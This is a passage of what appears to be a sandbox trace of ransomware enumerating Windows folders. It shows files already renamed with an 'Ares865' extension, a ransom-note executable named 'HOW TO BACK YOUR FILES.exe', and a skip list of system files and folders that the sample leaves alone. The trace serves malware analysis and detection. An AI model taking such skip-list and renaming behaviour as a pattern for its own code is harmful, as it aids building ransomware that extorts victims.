lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="perflogs") returned -1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="MSBuild") returned -1 [0128.649] lstrlenW (lpString="EmptyDatabase.zip.Ares865") returned 25 [0128.649] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip.Ares865") returned 115 [0128.649] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="EmptyDatabase.zip.Ares865" | out: lpString1="EmptyDatabase.zip.Ares865") returned="EmptyDatabase.zip.Ares865" [0128.649] lstrlenW (lpString="EmptyDatabase.zip.Ares865") returned 25 [0128.649] lstrlenW (lpString="Ares865") returned 7 [0128.649] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.649] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10ff6270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5262b140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x52b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Explorer.zip.Ares865", cAlternateFileName="EXPLOR~1.ARE")) returned 1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2=".") returned 1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="..") returned 1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="windows") returned -1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="bootmgr") returned 1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="temp") returned -1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.649] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="boot") returned 1 [0128.650] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="ids.txt") returned -1 [0128.650] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.650] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="perflogs") returned -1 [0128.650] lstrcmpiW (lpString1="Explorer.zip.Ares865", lpString2="MSBuild") returned -1 [0128.650] lstrlenW (lpString="Explorer.zip.Ares865") returned 20 [0128.650] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip.Ares865") returned 122 [0128.650] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="Explorer.zip.Ares865" | out: lpString1="Explorer.zip.Ares865") returned="Explorer.zip.Ares865" [0128.650] lstrlenW (lpString="Explorer.zip.Ares865") returned 20 [0128.650] lstrlenW (lpString="Ares865") returned 7 [0128.650] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.650] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1101c3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5262b140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Form.zip.Ares865", cAlternateFileName="FORMZI~1.ARE")) returned 1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2=".") returned 1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="..") returned 1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="windows") returned -1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="bootmgr") returned 1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="temp") returned -1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="boot") returned 1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="ids.txt") returned -1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="perflogs") returned -1 [0128.650] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="MSBuild") returned -1 [0128.650] lstrlenW (lpString="Form.zip.Ares865") returned 16 [0128.650] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip.Ares865") returned 117 [0128.650] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="Form.zip.Ares865" | out: lpString1="Form.zip.Ares865") returned="Form.zip.Ares865" [0128.650] lstrlenW (lpString="Form.zip.Ares865") returned 16 [0128.650] lstrlenW (lpString="Ares865") returned 7 [0128.650] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.650] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52592bc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52592bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.650] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.650] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1101c3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x526512a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb390, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LoginForm.zip.Ares865", cAlternateFileName="LOGINF~1.ARE")) returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2=".") returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="..") returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="windows") returned -1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="bootmgr") returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="temp") returned -1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="boot") returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="ids.txt") returned 1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="perflogs") returned -1 [0128.651] lstrcmpiW (lpString1="LoginForm.zip.Ares865", lpString2="MSBuild") returned -1 [0128.651] lstrlenW (lpString="LoginForm.zip.Ares865") returned 21 [0128.651] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip.Ares865") returned 113 [0128.651] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="LoginForm.zip.Ares865" | out: lpString1="LoginForm.zip.Ares865") returned="LoginForm.zip.Ares865" [0128.651] lstrlenW (lpString="LoginForm.zip.Ares865") returned 21 [0128.651] lstrlenW (lpString="Ares865") returned 7 [0128.651] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.651] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1101c3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x526512a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x39c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MDIParent.zip.Ares865", cAlternateFileName="MDIPAR~1.ARE")) returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2=".") returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="..") returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="windows") returned -1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="bootmgr") returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="temp") returned -1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="boot") returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="ids.txt") returned 1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.651] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="perflogs") returned -1 [0128.652] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="MSBuild") returned -1 [0128.652] lstrlenW (lpString="MDIParent.zip.Ares865") returned 21 [0128.652] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip.Ares865") returned 118 [0128.652] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="MDIParent.zip.Ares865" | out: lpString1="MDIParent.zip.Ares865") returned="MDIParent.zip.Ares865" [0128.652] lstrlenW (lpString="MDIParent.zip.Ares865") returned 21 [0128.652] lstrlenW (lpString="Ares865") returned 7 [0128.652] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.652] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11042530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52677400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x550, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Module.zip.Ares865", cAlternateFileName="MODULE~1.ARE")) returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2=".") returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="..") returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="windows") returned -1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="bootmgr") returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="temp") returned -1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="boot") returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="ids.txt") returned 1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="perflogs") returned -1 [0128.652] lstrcmpiW (lpString1="Module.zip.Ares865", lpString2="MSBuild") returned -1 [0128.652] lstrlenW (lpString="Module.zip.Ares865") returned 18 [0128.652] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip.Ares865") returned 118 [0128.652] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="Module.zip.Ares865" | out: lpString1="Module.zip.Ares865") returned="Module.zip.Ares865" [0128.652] lstrlenW (lpString="Module.zip.Ares865") returned 18 [0128.652] lstrlenW (lpString="Ares865") returned 7 [0128.652] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.652] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11100c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52677400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xba0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ResourceInternal.zip.Ares865", cAlternateFileName="RESOUR~1.ARE")) returned 1 [0128.652] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.652] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.652] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2=".") returned 1 [0128.652] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="..") returned 1 [0128.652] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="windows") returned -1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="bootmgr") returned 1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="temp") returned -1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="pagefile.sys") returned 1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="boot") returned 1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="ids.txt") returned 1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="ntuser.dat") returned 1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="perflogs") returned 1 [0128.653] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="MSBuild") returned 1 [0128.653] lstrlenW (lpString="ResourceInternal.zip.Ares865") returned 28 [0128.653] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip.Ares865") returned 115 [0128.653] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="ResourceInternal.zip.Ares865" | out: lpString1="ResourceInternal.zip.Ares865") returned="ResourceInternal.zip.Ares865" [0128.653] lstrlenW (lpString="ResourceInternal.zip.Ares865") returned 28 [0128.653] lstrlenW (lpString="Ares865") returned 7 [0128.653] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.653] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11100c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5269d560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x720, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsInternal.zip.Ares865", cAlternateFileName="SETTIN~1.ARE")) returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2=".") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="..") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="windows") returned -1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="bootmgr") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="temp") returned -1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="pagefile.sys") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="boot") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="ids.txt") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="ntuser.dat") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="perflogs") returned 1 [0128.653] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="MSBuild") returned 1 [0128.653] lstrlenW (lpString="SettingsInternal.zip.Ares865") returned 28 [0128.653] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip.Ares865") returned 125 [0128.653] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="SettingsInternal.zip.Ares865" | out: lpString1="SettingsInternal.zip.Ares865") returned="SettingsInternal.zip.Ares865" [0128.653] lstrlenW (lpString="SettingsInternal.zip.Ares865") returned 28 [0128.654] lstrlenW (lpString="Ares865") returned 7 [0128.654] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.654] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11126d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5269d560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xef20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SplashScreen.zip.Ares865", cAlternateFileName="SPLASH~1.ARE")) returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2=".") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="..") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="windows") returned -1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="bootmgr") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="temp") returned -1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="pagefile.sys") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="boot") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="ids.txt") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="ntuser.dat") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="perflogs") returned 1 [0128.654] lstrcmpiW (lpString1="SplashScreen.zip.Ares865", lpString2="MSBuild") returned 1 [0128.654] lstrlenW (lpString="SplashScreen.zip.Ares865") returned 24 [0128.654] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip.Ares865") returned 125 [0128.654] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="SplashScreen.zip.Ares865" | out: lpString1="SplashScreen.zip.Ares865") returned="SplashScreen.zip.Ares865" [0128.654] lstrlenW (lpString="SplashScreen.zip.Ares865") returned 24 [0128.654] lstrlenW (lpString="Ares865") returned 7 [0128.654] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.654] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x111bf2f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x526c36c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Text.zip.Ares865", cAlternateFileName="TEXTZI~1.ARE")) returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2=".") returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="..") returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="windows") returned -1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="bootmgr") returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="temp") returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="pagefile.sys") returned 1 [0128.654] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="boot") returned 1 [0128.655] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="ids.txt") returned 1 [0128.655] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="ntuser.dat") returned 1 [0128.655] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="perflogs") returned 1 [0128.655] lstrcmpiW (lpString1="Text.zip.Ares865", lpString2="MSBuild") returned 1 [0128.655] lstrlenW (lpString="Text.zip.Ares865") returned 16 [0128.655] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip.Ares865") returned 121 [0128.655] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="Text.zip.Ares865" | out: lpString1="Text.zip.Ares865") returned="Text.zip.Ares865" [0128.655] lstrlenW (lpString="Text.zip.Ares865") returned 16 [0128.655] lstrlenW (lpString="Ares865") returned 7 [0128.655] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.655] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x526c36c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserControl.zip.Ares865", cAlternateFileName="USERCO~1.ARE")) returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2=".") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="..") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="windows") returned -1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="bootmgr") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="temp") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="pagefile.sys") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="boot") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="ids.txt") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="ntuser.dat") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="perflogs") returned 1 [0128.655] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="MSBuild") returned 1 [0128.655] lstrlenW (lpString="UserControl.zip.Ares865") returned 23 [0128.655] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip.Ares865") returned 113 [0128.655] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="UserControl.zip.Ares865" | out: lpString1="UserControl.zip.Ares865") returned="UserControl.zip.Ares865" [0128.655] lstrlenW (lpString="UserControl.zip.Ares865") returned 23 [0128.655] lstrlenW (lpString="Ares865") returned 7 [0128.655] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.655] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x526c36c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserControl.zip.Ares865", cAlternateFileName="USERCO~1.ARE")) returned 0 [0128.655] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.656] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0128.656] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp" [0128.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0128.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0128.656] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp") returned 86 [0128.656] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp") returned="C:\\Program Files 